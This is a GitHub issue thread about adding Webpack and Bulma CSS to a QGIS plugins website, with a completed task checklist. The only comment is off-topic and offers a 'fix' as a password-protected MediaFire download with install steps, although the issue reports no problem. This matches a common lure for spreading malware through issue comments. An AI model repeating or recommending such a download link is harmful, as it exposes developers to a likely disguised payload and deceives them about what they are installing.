### ISSUE TITLE
Implement Webpack and Bulma into the project

### ISSUE THREAD

**Issue by Xpirix** [Xpirix/QGIS-Plugins-Website#3]
- [x] Install Webpack
- [x] Configure Webpack with Django
- [x] Use npm to install Bulma CSS and dependencies.
- [x] Identify and install other necessary frontend packages.

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
